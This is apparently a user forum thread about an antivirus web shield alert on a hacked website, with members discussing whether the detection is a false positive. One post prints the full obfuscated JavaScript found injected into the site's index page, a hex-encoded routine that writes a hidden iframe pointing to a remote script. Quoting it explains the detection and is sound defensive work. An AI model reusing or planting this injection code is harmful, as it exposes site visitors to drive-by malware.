Possible False Positive VBS:Malware-Gen

Viruses and worms
1

I am new to Avast, and since switching, I can no longer log into “www .uk-bug.net/index.php”
Could someone check and see if this is indeed a problem.
Thanks.

Lee

2

Welcome to the forums, Leebme. :slight_smile:

I had no trouble getting to that webpage.

What firewall are you using and have you allowed avast through the firewall?

3

The Avast webshield alerts me to the same threat posted by the OP, about halfway through loading the page, and aborts the connection. I don’t know if there is actually anything malware-ish on the page, though. Lots of sponsored ads. Attempting to navigate anywhere through the site produces the same warning.

4

Dr. Web says it’s clean…
But nowadays, I trust more in avast (on scanning encrypted webpages scripts) than Dr. Web.
Anyway, the generic detection could be due to an avast false positive indeed…

5

File index.php was injected with obfuscated javascript. Script is injected before end tag BODY on line 817

6

Well… My guesses are correct :wink:

7

Hmmm … I just went to that website again and still get no warnings from avast even though the site is fully loaded.

Anyone got any ideas why I get no warnings?

EDIT :

ScanDoo finds nothing wrong with the site.

8

It alerts for me using firefox, what browser are you using and is the web shield even scanning its content ?

I wouldn’t expect scandoo to find anything in a case like this is just sees a script tag and doesn’t go to the depths that avast does in scanning content.


<script type="text/javascript">
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC)
{var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}#
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;
return A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";
for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C(AF1EAFAE6DA9EFFC64209858078EBFBC.
substr(E846AAB0F24560E5FDD,FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F76696573
2E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D31206865696768743
D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A616273
6F6C757465223E3C2F696672616D653E");
</script>

I have broken the single line of code so it doesn’t stretch for miles.

I doubt that they would look at this and think like avast’s scan does that this is suspect based on the obfuscation in the javascript.

9

Opera 9.52 … and Webshield is running.

10

Thanks for the reply. I am using Comodo Firewall and Avast is allowed thru the firewall. My browser is IE-6. I know, a old browser but works great.
So far, this is the only site which I am having a problem with.

Lee

11

Yes and the reason for the problem, a hacked/infected site blocked by avast, so not a problem as such, but a good save by avast.

It looks like the site is still infected and avast isn’t the only AV to think so, 7/36 think something smells, http://www.virustotal.com/analisis/5607b119f09a146c9410acf814097fe1. Whilst most of the detections are generic or heuristic, based on what has been stated above I believe it is still a good detection.

So it looks like the site owner is unaware of this.

12

Will someone there notify them as such? I am not sure what my options are now. I guess just not go there for awhile in hopes that they will correct the problem.

Thanks again.

Lee

13

You’re welcome.

I’m just an avast user like yourself, you could try and email to something like webmaster (at) the website domain name.com if it is somewhere you regularly visit.